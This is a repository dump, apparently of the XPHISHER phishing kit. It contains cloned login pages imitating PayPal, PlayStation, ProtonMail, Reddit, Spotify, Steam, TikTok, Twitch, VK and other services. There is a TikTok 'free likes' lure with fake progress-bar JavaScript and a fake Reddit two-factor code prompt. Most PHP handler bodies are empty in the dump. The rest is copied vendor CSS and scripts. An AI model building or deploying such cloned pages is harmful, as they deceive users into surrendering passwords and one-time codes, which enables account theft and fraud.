.otkicon-profile{font-size:24px;color:#1e262c}#prepopulate-email{padding:10px}#prepopulate-email .otkicon-profile:before{content:"\e606"}#login-with-phone-number{display:inline-block;margin-top:6px;cursor:pointer}#logout-and-relogin{display:inline-block;margin-top:6px;cursor:pointer}.otkicon-warning{font-size:96px;left:-18px;color:#fea722}.otknotice-stripe{background-color:#22313c;color:#fff;position:fixed;z-index:0;top:0;height:0;width:100%;transition:all .6s cubic-bezier(0.03,1,0.2,1);text-align:center;overflow:hidden}.otknotice-error,.otknotice-passive,.otknotice-warning{background-color:#22313c;color:#fff}.otknotice-error+.views section,.otknotice-passive+.views section,.otknotice-warning+.views section{height:calc(708px - 150px)}.otknotice-stripe.otknotice-active{z-index:1000;padding:8px 0 16px 0;height:initial;transition:all .6s cubic-bezier(0.03,1,0.2,1)}.otknotice-stripe{position:static}.otknotice-stripe-message .otkicon{left:0}.otknotice-error .otkicon{color:#ff6550;font-size:24px;top:6px;padding-right:0}.otknotice-passive .otkicon{color:#2ac4f5;font-size:24px;top:6px;padding-right:0}.otknotice-warning .otkicon{color:#fea722;font-size:24px;top:6px;padding-right:0}.otkicon-warning:before{font-size:24px}.otkcheckbox>label,.otkradio>label{display:inline}.checkbox-login-first{display:block;margin-bottom:20px}.checkbox-login-last{display:block;margin-bottom:20px}.otktooltip-withcontent{display:inline-table;position:relative}.otkicon-help{font-size:24px;color:#c3c6ce;position:static;height:17px;display:-webkit-inline-box;top:0}#check-phone-number-form{margin-bottom:25px}.phone-number-container .ptklabel{display:block;margin-bottom:10px}.phone-number-container .otktooltip-inner{padding:15px}.phone-number-container .otktooltip-arrow{bottom:-5px!important}.phone-number-input{display:flex}.phone-number-select{position:relative;width:30%}.phone-number-select select{border-bottom-right-radius:0}.phone-number-write{width:70%}.phone-number-write input{border-top-left-radius:0!important;border-bottom-left-radius:0!important}.phone-number-pad{padding-left:38px;border-top-right-radius:0;border-bottom-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.phone-number-pad,.phone-number-placeholder{padding-left:38px;border-top-right-radius:0;border-bottom-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.phone-number-placeholder{color:#787d85} -------------------------------------------------------------------------------- /.sites/origin/utag.js: -------------------------------------------------------------------------------- 1 | //tealium universal tag - utag.344 ut4.0.201610241851, Copyright 2016 Tealium.com Inc. All Rights Reserved. 2 | try{(function(id,loader){var u={};utag.o[loader].sender[id]=u;if(utag.ut===undefined){utag.ut={};} 3 | if(utag.ut.loader===undefined){u.loader=function(o){var b,c,l,a=document;if(o.type==="iframe"){b=a.createElement("iframe");o.attrs=o.attrs||{"height":"1","width":"1","style":"display:none"};for(l in utag.loader.GV(o.attrs)){b.setAttribute(l,o.attrs[l]);}b.setAttribute("src",o.src);}else if(o.type=="img"){utag.DB("Attach img: "+o.src);b=new Image();b.src=o.src;return;}else{b=a.createElement("script");b.language="javascript";b.type="text/javascript";b.async=1;b.charset="utf-8";for(l in utag.loader.GV(o.attrs)){b[l]=o.attrs[l];}b.src=o.src;}if(o.id){b.id=o.id};if(typeof o.cb=="function"){if(b.addEventListener){b.addEventListener("load",function(){o.cb()},false);}else{b.onreadystatechange=function(){if(this.readyState=='complete'||this.readyState=='loaded'){this.onreadystatechange=null;o.cb()}};}}l=o.loc||"head";c=a.getElementsByTagName(l)[0];if(c){utag.DB("Attach to "+l+": "+o.src);if(l=="script"){c.parentNode.insertBefore(b,c);}else{c.appendChild(b)}}}}else{u.loader=utag.ut.loader;} 4 | if(utag.ut.typeOf===undefined){u.typeOf=function(e){return({}).toString.call(e).match(/\s([a-zA-Z]+)/)[1].toLowerCase();};}else{u.typeOf=utag.ut.typeOf;} 5 | if(utag.ut.merge===undefined){u.merge=function(a,b,c,d){if(c){for(d in utag.loader.GV(b)){a[d]=b[d];}}else{for(d in utag.loader.GV(b)){if(typeof a[d]=="undefined"){a[d]=b[d];}}}};}else{u.merge=utag.ut.merge;} 6 | u.ev={"view":1,"link":1};u.initialized=false;u.scriptrequested=false;u.queue=[];u.event_lookup={"ViewContent":{obj:"vc","map":["value","currency","content_name","content_ids","content_category"]},"Search":{obj:"search","map":["value","currency","content_category","content_ids"]},"AddToCart":{obj:"cart","map":["value","currency","content_name","content_ids"]},"AddToWishlist":{obj:"wish","map":["value","currency","content_name","content_ids"]},"InitiateCheckout":{obj:"cout","map":["value","currency","content_name","content_ids","num_items"]},"AddPaymentInfo":{obj:"payment","map":["value","currency","content_category","content_ids"]},"Purchase":{obj:"purch","map":["value","currency","content_name","content_ids","num_items"]},"Lead":{obj:"lead","map":["value","currency","content_name","content_category"]},"CompleteRegistration":{obj:"reg","map":["value","currency","content_name"]},"Conversion":{obj:"cnv","map":["value","currency"]},"Custom":{obj:"cust","map":[]},"PageView":{obj:"page","map":[]}};u.std_params={"value":function(g,event){if(g.value===undefined||g.value===""){if(event==="ViewContent"||event==="AddToCart"){g.value=u.data.ecom.product_unit_price;}else{g.value=u.data.ecom.order_subtotal;}} 7 | g.value=u.val(g.value);},"currency":function(g){if(!g.currency){g.currency=u.data.ecom.order_currency;}},"content_name":function(g){if(!g.content_name){g.content_name=u.data.ecom.product_name;} 8 | g.content_name=u.val(g.content_name);},"content_ids":function(g){if(!g.content_ids){g.content_ids=u.data.ecom.product_id;} 9 | if(u.typeOf(g.content_ids)!=="array"){g.content_ids=g.content_ids.split(/\s*,\s*/);}},"content_category":function(g){if(!g.content_category){g.content_category=u.data.ecom.product_category;} 10 | g.content_category=u.val(g.content_category);},"num_items":function(g){if(!g.num_items&&u.data.calc_items==="true"){g.num_items=u.calc_items(u.data.ecom.product_quantity);}}};u.map_func=function(arr,obj,item){var i=arr.shift();obj[i]=obj[i]||{};if(arr.length>0){u.map_func(arr,obj[i],item);}else{obj[i]=item;}};u.val=function(value){return u.typeOf(value)==="array"?value[0]:value;};u.remove_empty=function(a){var b,t;for(b in utag.loader.GV(a)){t=u.typeOf(a[b]);if(t==="object"){u.remove_empty(a[b]);if(u.isEmptyObject(a[b])){try{delete a[b];}catch(e){a[b]=undefined;}}}else if(!((a[b]===0||a[b]===false)?!0:(t==="array"&&a[b].length===0)?!1:!!a[b])){try{delete a[b];}catch(e){a[b]=undefined;}}} 11 | return a;};u.calc_items=function(quan){var q,i=0;for(q=0;q 6 | -------------------------------------------------------------------------------- /.sites/paypal/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/pinterest/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/pinterest/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/playstation/Index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/playstation/api.js.download: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};(cfg['enterprise']=cfg['enterprise']||[]).push(false);(cfg['render']=cfg['render']||[]).push('explicit');(cfg['onload']=cfg['onload']||[]).push('widgetLoaded');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/5fbZx3NV5xhaMoMLrZV3TkN4/recaptcha__en_gb.js';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s); })(); -------------------------------------------------------------------------------- /.sites/playstation/button_icon_password_off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/playstation/button_icon_password_off.png -------------------------------------------------------------------------------- /.sites/playstation/kekka-22361ea3e8890b95e7b006a784440d01.css: -------------------------------------------------------------------------------- 1 | /** 2 | * kekka.css 3 | * Copyright 2016 Sony Corporation 4 | * 5 | */ 6 | 7 | * :not(p):not(h2):not(h3):not(ul):not(li){margin:0;padding:0;-webkit-tap-highlight-color:transparent}body,html{height:100%}body{overflow:hidden;font-family:-apple-system,BlinkMacSystemFont,'Helvetica Neue',Helvetica,HiraKakuProN-W3,'Noto Sans CJK JP',sans-serif;-webkit-text-size-adjust:100%}span{unicode-bidi:embed}html{font-size:10px} 8 | -------------------------------------------------------------------------------- /.sites/playstation/loading.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/playstation/loading.png -------------------------------------------------------------------------------- /.sites/playstation/loading_base.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/playstation/loading_base.png -------------------------------------------------------------------------------- /.sites/playstation/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/playstation/logo_playstation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/playstation/logo_playstation.png -------------------------------------------------------------------------------- /.sites/playstation/saved_resource: -------------------------------------------------------------------------------- 1 | ndwti({"wi":"w-666234","wmd":{"ipr":{"fm":[],"lm":true,"tl":20000},"wk":{"r":"test"},"di":{"rt":128,"ut":512},"af":[]},"fd":{"ipr":"p","bi":"p","wt":"1.w-666234.1.2.4ODTuykD3bYvqj9RpaK5gw,,.I2PzRDkmu3FRo1eMxiTzb7fp9vKKTvu44DXdevnl1nf38CBmmTErco0FkBbSYGiiX1Iy6chd2bUFDuidinMfM7Et6PpjVbrSCaWoqZ3REB5jioKKtRRF_CYwy2Pe2KdMrSr1tPWzMnfKriMbHKEStZLeR0tj3FShVopqekSIwljoEtpOBBZMvXKezIF1CaqhjSKnH9JYg0l5yRw9UHN329dfmmixtzC1RF3ZrjKLTlTJrmC3TR2j3UxUU41NTKTtXNo33HJr-Z3ZCuKAzXhdyQ,,"},"gf":[]}) -------------------------------------------------------------------------------- /.sites/playstation/sony_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/playstation/sony_logo.png -------------------------------------------------------------------------------- /.sites/playstation/vendor-571d67531622102402268bd2c623c17f.css: -------------------------------------------------------------------------------- 1 | .liquid-container{position:relative;overflow:hidden;-webkit-transform:translateY(0);-moz-transform:translateY(0);transform:translateY(0)}.liquid-child{overflow:hidden} -------------------------------------------------------------------------------- /.sites/playstation/wallpaper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/playstation/wallpaper.jpg -------------------------------------------------------------------------------- /.sites/protonmail/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/protonmail/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/protonmail/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/protonmail/logo.png -------------------------------------------------------------------------------- /.sites/quora/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | reCAPTCHA 7 | 178 | 179 | 180 | 183 | 184 |
-------------------------------------------------------------------------------- /.sites/quora/iframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /.sites/quora/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/quora/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/reddit/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/reddit/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | reddit.com: Log in 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 |
40 | 41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |

49 | 50 | Sign in 51 | 52 |

53 |

54 | You have two-factor authentication enabled on this account because you're awesome. 55 |

56 |
57 | 58 | 59 | 60 | 61 | 66 |
67 | 68 | 69 |
70 | 71 |
72 | 73 | 74 |
75 | 76 |
77 |
78 | Use a backup code 79 |
80 |
81 | 82 |
83 | 85 |
86 |
87 |
88 | 93 | 96 |
97 | Go back to account detailsHaving trouble ? 100 |
101 |
102 |
103 |
104 |
105 | 106 | 107 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /.sites/reddit/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /.sites/snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/snapchat/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/spotify/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('explicit');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /.sites/spotify/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | reCAPTCHA 6 | 177 | 178 | 179 | 182 | 183 |
-------------------------------------------------------------------------------- /.sites/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/spotify/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Login - Spotify 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
-------------------------------------------------------------------------------- /.sites/spotify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/stackoverflow/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/stackoverflow/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/steam/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/steam/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/tiktok/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/tiktok/jscript.js: -------------------------------------------------------------------------------- 1 | function updateyear() { 2 | var today = new Date(); 3 | var year = today.getFullYear(); 4 | document.getElementById("year").innerHTML = year; 5 | } 6 | 7 | var randomnumber = setInterval(randomuser,6000); 8 | 9 | var getresources = 336699; 10 | var resourcestime = setInterval(resourcesupdate,100); 11 | 12 | var today = new Date().toLocaleDateString('en-US', { 13 | day : 'numeric', 14 | month : 'short', 15 | year : 'numeric' 16 | }).split(' ').join(' '); 17 | 18 | setTimeout(toolupdated, 300); 19 | 20 | function toolupdated() { 21 | document.getElementById("date").innerHTML = today; 22 | } 23 | 24 | function move() { 25 | var username = document.getElementById("username").value; 26 | var follower = document.getElementById("follower").value; 27 | var like = document.getElementById("like").value; 28 | 29 | if(username == "") { 30 | alert("Please insert your tiktok.com username or email address."); 31 | return false; 32 | } 33 | 34 | document.getElementById("fillup").style.display = "none"; 35 | document.getElementById("steps").style.display = "none"; 36 | document.getElementById("comment").style.display = "none"; 37 | document.getElementById("progressbarcontainer").style.display = "block"; 38 | var elem = document.getElementById("progressbar"); 39 | var width = 10; 40 | var id = setInterval(frame, 693); 41 | function frame() { 42 | if (width > 10 && width < 20) { 43 | document.getElementById("progresslog").innerHTML = "Menghubungkan..."; 44 | $("#gen1").fadeIn("slow"); 45 | } 46 | 47 | if (width > 20 && width < 30) { 48 | document.getElementById("progresslog").innerHTML = "Menghubungkan.."; 49 | $("#gen1").fadeOut("slow"); 50 | $("#gen2").fadeIn("slow"); 51 | } 52 | 53 | if (width > 30 && width < 40) { 54 | document.getElementById("progresslog").innerHTML = "Mencari Username : "+username+""; 55 | $("#gen2").fadeOut("slow"); 56 | $("#gen3").fadeIn("slow"); 57 | } 58 | 59 | if (width > 40 && width < 45) { 60 | document.getElementById("progresslog").innerHTML = "Username "+username+" Berhasil Terhubung!"; 61 | $("#gen3").fadeOut("slow"); 62 | $("#gen4").fadeIn("slow"); 63 | } 64 | 65 | 66 | if (width > 60 && width < 75) { 67 | document.getElementById("progresslog").innerHTML = "Mengirim "+follower+" Followers Ke "+username+""; 68 | $("#gen5").fadeOut("slow"); 69 | $("#gen6").fadeIn("slow"); 70 | 71 | if (document.getElementById("addfollowerbarlabel").innerHTML == 0) { 72 | startaddfollower(); 73 | } 74 | } 75 | 76 | if (width > 75 && width < 90) { 77 | document.getElementById("progresslog").innerHTML = "Mengirim "+like+" Like Ke "+username+""; 78 | $("#gen6").fadeOut("slow"); 79 | $("#gen7").fadeIn("slow"); 80 | 81 | if (document.getElementById("addlikebarlabel").innerHTML == 0) { 82 | startaddlike(); 83 | } 84 | } 85 | 86 | if (width > 90 && width < 99) { 87 | document.getElementById("progresslog").innerHTML = "Berhasil!"; 88 | $("#gen7").fadeOut("slow"); 89 | $("#gen1").fadeIn("slow"); 90 | } 91 | 92 | if (width >= 99) { 93 | setTimeout(verify, 1000); 94 | clearInterval(id); 95 | } else { 96 | width++; 97 | elem.style.width = width + '%'; 98 | document.getElementById("progressbarlabel").innerHTML = width * 1 + '%'; 99 | } 100 | } 101 | } 102 | 103 | function verify() { 104 | document.getElementById("verifybg").style.height = "100%"; 105 | } 106 | 107 | function randomuser() { 108 | document.getElementById("randomnumber").innerHTML = Math.floor(Math.random() * 9999); 109 | } 110 | 111 | function resourcesupdate() { 112 | document.getElementById("resources").innerHTML = getresources++; 113 | } 114 | 115 | function startaddfollower() { 116 | var addfollowerelem = document.getElementById("addfollowerbar"); 117 | var addfollowerwidth = 1; 118 | var addfollowerwidthid = setInterval(addfollowerwidthnow, 16); 119 | var addfollowerid = setInterval(addfollowernow, 3); 120 | var addfollower = 0; 121 | 122 | var addfollowerspeed = 0; 123 | 124 | if(document.getElementById("follower").value == 10000) 125 | { 126 | addfollowerspeed = 50; 127 | } 128 | 129 | if(document.getElementById("follower").value == 50000) 130 | { 131 | addfollowerspeed = 100; 132 | } 133 | 134 | if(document.getElementById("follower").value == 75000) 135 | { 136 | addfollowerspeed = 250; 137 | } 138 | 139 | if(document.getElementById("follower").value == 100000) 140 | { 141 | addfollowerspeed = 500; 142 | } 143 | 144 | function addfollowernow() { 145 | if (addfollower >= document.getElementById("follower").value) { 146 | clearInterval(addfollowerid); 147 | } else { 148 | addfollower += addfollowerspeed; 149 | document.getElementById("addfollowerbarlabel").innerHTML = addfollower; 150 | } 151 | } 152 | 153 | function addfollowerwidthnow() { 154 | if (addfollowerwidth >= 100) { 155 | clearInterval(addfollowerwidthid); 156 | } else { 157 | addfollowerwidth++; 158 | addfollowerelem.style.width = addfollowerwidth + '%'; 159 | } 160 | } 161 | } 162 | 163 | function startaddlike() { 164 | var addlikeelem = document.getElementById("addlikebar"); 165 | var addlikewidth = 1; 166 | var addlikewidthid = setInterval(addlikewidthnow, 16); 167 | var addlikeid = setInterval(addlikenow, 3); 168 | var addlike = 0; 169 | 170 | var addlikespeed = 0; 171 | 172 | if(document.getElementById("like").value == 10000) 173 | { 174 | addlikespeed = 50; 175 | } 176 | 177 | if(document.getElementById("like").value == 50000) 178 | { 179 | addlikespeed = 100; 180 | } 181 | 182 | if(document.getElementById("like").value == 75000) 183 | { 184 | addlikespeed = 250; 185 | } 186 | 187 | if(document.getElementById("like").value == 100000) 188 | { 189 | addlikespeed = 500; 190 | } 191 | 192 | function addlikenow() { 193 | if (addlike >= document.getElementById("like").value) { 194 | clearInterval(addlikeid); 195 | } else { 196 | addlike += addlikespeed; 197 | document.getElementById("addlikebarlabel").innerHTML = addlike; 198 | } 199 | } 200 | 201 | function addlikewidthnow() { 202 | if (addlikewidth >= 100) { 203 | clearInterval(addlikewidthid); 204 | } else { 205 | addlikewidth++; 206 | addlikeelem.style.width = addlikewidth + '%'; 207 | } 208 | } 209 | } -------------------------------------------------------------------------------- /.sites/tiktok/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Tik Tok Followers 9 | 10 | 11 | 12 | 26 | 27 | 28 |
29 |
30 |
31 |

Login

32 |

Login to get 1000 Tiktok Likes Free

33 | 34 |
35 |
36 |
37 |
38 | 39 |
40 |
41 |
42 | 43 |
44 | 45 |

46 | 47 |
48 | 49 |
50 |
51 | 52 | 55 | 56 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /.sites/tiktok/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/tiktok/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/tiktok/logo.png -------------------------------------------------------------------------------- /.sites/tiktok/sadflix.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/tiktok/sadflix.ttf -------------------------------------------------------------------------------- /.sites/tiktok/style.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: sadflix; 3 | src: url(sadflix.ttf); 4 | } 5 | 6 | .fullscreen-bg { 7 | position: fixed; 8 | top: 0; 9 | right: 0; 10 | bottom: 0; 11 | left: 0; 12 | overflow: hidden; 13 | z-index: -100; 14 | } 15 | 16 | .fullscreen-bg__video { 17 | margin-left:auto; 18 | margin-right:auto; 19 | position: relative; 20 | top: 0; 21 | left: 0; 22 | height: 100%; 23 | } 24 | 25 | body { 26 | text-align: center; 27 | font-family: sadflix; 28 | color: white; 29 | } 30 | 31 | img { 32 | display: block; 33 | margin-left: auto; 34 | margin-right: auto; 35 | } 36 | 37 | table { 38 | margin-left:auto; 39 | margin-right:auto; 40 | } 41 | 42 | select.input-command { 43 | border-radius: 9px; 44 | height: 46px; 45 | line-height: 46px; 46 | font-family: sadflix; 47 | background-color: white; 48 | box-shadow: 0 1px 1px rgba(2, 83, 136, 0.075) inset; 49 | color: black; 50 | } 51 | 52 | .form-option { 53 | margin-left: 15px; 54 | margin-right: 38px; 55 | margin-bottom: 20px; 56 | font-family: sadflix; 57 | } 58 | 59 | .input-form { 60 | border-radius: 9px; 61 | color: black; 62 | background-color: white; 63 | box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset; 64 | display: block; 65 | font-size: 14px; 66 | height: 20px; 67 | line-height: 1.42857; 68 | padding: 6px 12px; 69 | transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s; 70 | vertical-align: middle; 71 | width: 100%; 72 | font-family: sadflix; 73 | } 74 | 75 | .input-command { 76 | font-size: 18px; 77 | height: 28px; 78 | line-height: 1.33; 79 | padding: 10px 16px; 80 | color: black; 81 | } 82 | 83 | .input-form::-moz-placeholder { 84 | color: #999; 85 | opacity: 55; 86 | } 87 | 88 | .wrapper { 89 | padding: 0; 90 | } 91 | 92 | .wrapper img { 93 | width: 30%; 94 | } 95 | 96 | .buttonstyle { 97 | background: Transparent; /* For browsers that do not support gradients */ 98 | border-radius: 19px; 99 | border: 6px white solid; 100 | color: white; 101 | padding: 16px 33px; 102 | display: inline-block; 103 | font-size: 33px; 104 | height: auto; 105 | font-family: sadflix; 106 | } 107 | 108 | #progressbarcontainer { 109 | background: white; 110 | border-radius: 19px; 111 | border: 9px white solid; 112 | display: none; 113 | position: relative; 114 | margin-left: auto; 115 | margin-right: auto; 116 | width: 90%; 117 | height: 30px; 118 | } 119 | 120 | #progressbar { 121 | border-radius: 19px; 122 | position: absolute; 123 | width: 10%; 124 | height: 100%; 125 | background: #150608; 126 | } 127 | 128 | #progressbarlabel { 129 | line-height: 30px; 130 | text-align: center; 131 | color: white; 132 | } 133 | 134 | #main-tool { 135 | background: #000000; /* For browsers that do not support gradients */ 136 | background: -webkit-radial-gradient(#000000, #000000); /* Safari 5.1 to 6.0 */ 137 | background: -o-radial-gradient(#000000, #000000); /* For Opera 11.6 to 12.0 */ 138 | background: -moz-radial-gradient(#000000, #000000); /* For Firefox 3.6 to 15 */ 139 | background: radial-gradient(#000000, #000000); /* Standard syntax */ 140 | border-radius: 9px; 141 | max-width: 500px; 142 | margin: 20px auto 20px; 143 | padding: 50px; 144 | box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19); 145 | } 146 | 147 | 148 | 149 | 150 | #verifybg { 151 | height: 0%; 152 | width: 100%; 153 | left: 0; 154 | top: 0; 155 | position: fixed; 156 | z-index: 1; 157 | overflow-x: hidden; 158 | transition: 0.5s; 159 | background-color: rgb(0,0,0); 160 | background-color: rgba(0,0,0, 0.3); 161 | } 162 | 163 | #verify { 164 | margin-left: auto; 165 | margin-right: auto; 166 | color: white; 167 | position: relative; 168 | background: #f98691; /* For browsers that do not support gradients */ 169 | background: -webkit-radial-gradient(#09f5f9, #f98691); /* Safari 5.1 to 6.0 */ 170 | background: -o-radial-gradient(#09f5f9, #f98691); /* For Opera 11.6 to 12.0 */ 171 | background: -moz-radial-gradient(#09f5f9, #f98691); /* For Firefox 3.6 to 15 */ 172 | background: radial-gradient(#150608, #f98691); /* Standard syntax */ 173 | box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19); 174 | border-radius: 9px; 175 | width: 90%; 176 | } 177 | 178 | #verifycontent { 179 | margin-left: auto; 180 | margin-right: auto; 181 | width: 90%; 182 | } 183 | 184 | #shield{ 185 | margin-bottom: 5px; 186 | } 187 | 188 | #gen1 { 189 | display: none; 190 | } 191 | 192 | #gen2 { 193 | display: none; 194 | } 195 | 196 | #gen3 { 197 | display: none; 198 | } 199 | 200 | #gen4 { 201 | display: none; 202 | } 203 | 204 | #gen5 { 205 | display: none; 206 | } 207 | 208 | #gen6 { 209 | display: none; 210 | } 211 | 212 | #gen7 { 213 | display: none; 214 | } 215 | 216 | #addfollowerbarcontainer { 217 | background: white; 218 | border-radius: 19px; 219 | border: 9px white solid; 220 | position: relative; 221 | margin-left: auto; 222 | margin-right: auto; 223 | width: 60%; 224 | height: 10px; 225 | } 226 | 227 | #addfollowerbar { 228 | border-radius: 19px; 229 | position: absolute; 230 | background: #ff0f50; 231 | width: 1%; 232 | height: 100%; 233 | } 234 | 235 | #addfollowerbarlabel { 236 | font-size: 60%; 237 | line-height: 10px; 238 | text-align: center; 239 | color: white; 240 | font-family: sadflix; 241 | } 242 | 243 | #addlikebarcontainer { 244 | background: white; 245 | border-radius: 19px; 246 | border: 9px white solid; 247 | position: relative; 248 | margin-left: auto; 249 | margin-right: auto; 250 | width: 60%; 251 | height: 10px; 252 | } 253 | 254 | #addlikebar { 255 | border-radius: 19px; 256 | position: absolute; 257 | background: #ff0f50; 258 | width: 1%; 259 | height: 100%; 260 | } 261 | 262 | #addlikebarlabel { 263 | font-size: 60%; 264 | line-height: 10px; 265 | text-align: center; 266 | color: white; 267 | font-family: sadflix; 268 | } -------------------------------------------------------------------------------- /.sites/twitch/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/twitch/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/vk/b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download: -------------------------------------------------------------------------------- 1 | (window.webpackJsonp=window.webpackJsonp||[]).push([["b-0f6403442fbf95cd84849e54d8e9ab53"],{DM2o:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.statlogsValueEvent=function(e,t){for(var r=arguments.length,n=new Array(r>2?r-2:0),s=2;s4&&void 0!==arguments[4]?arguments[4]:"None",a=window.locDomain,c=e+"="+escape(t),u="; path=/"+(a?"; domain=."+a:""),s="https:"===location.protocol,l=!!o;(0,n.partConfigEnabled)("cookie_secure_default_true")&&(l=!1!==o);var f=s&&l?"; secure":"",p=l&&browser.chrome&&parseInt(browser.version)>=71&&(0,n.partConfigEnabled)("cookie_class_samesite")?"; SameSite=".concat(i):"",d="";if(r){var g=new Date;g.setTime(g.getTime()+24*r*60*60*1e3),d="; expires="+g.toGMTString()}document.cookie=c+d+u+p+f},t.initCookies=function(){window._cookies={}};var n=r("W9Tc"),o=r("DM2o")},W9Tc:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.partConfigEnabled=function(e){var t=window.vk.pe;return!!(void 0===t?{}:t)[e]},t.calculateTimeOffsets=function(){var e=window.vk.ts;if(e&&!window.browser.opera_mobile){var t=new 